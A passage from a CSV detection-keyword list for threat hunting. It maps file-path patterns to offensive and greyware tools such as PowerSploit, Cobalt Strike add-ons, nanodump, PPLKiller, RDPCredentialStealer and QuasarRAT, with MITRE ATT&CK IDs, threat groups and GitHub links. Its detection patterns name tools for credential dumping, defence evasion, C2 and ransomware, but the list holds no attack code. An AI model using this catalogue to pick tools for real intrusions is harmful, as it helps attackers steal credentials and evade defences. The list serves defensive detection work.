- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*\PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*\powerglot\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*\power-pwn\*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*\powershell.exe* += hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* +=hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* = hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\powershell.exe* =hidden*","greyware_tool_keyword","powershell","command aiming to hide a file. It can be performed with powershell on a WINDOWS machine with command option =hidden","T1562.002","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\Powerup.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*\PowerView.exe*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*\Powerview.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\PowerView.ps1*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*\PowerView3.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*\ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*\PPLBlade-main*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\PrintSpoofer.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*\PrivEditor\*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*\PrivKit\*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*\procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Process Hacker 2\*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Program Files\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\ProgramData\asrephashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\PS2EXE\*.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\PsExecLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*\Public\dcapi.dll*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\public\klogging.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*\Public\Music\RDPCreds.txt*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*\pwn.exe*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*\pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*\rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*\rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*\RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*\ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*\ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*\rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*\rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\RDPCredsStealerDLL*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*\RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 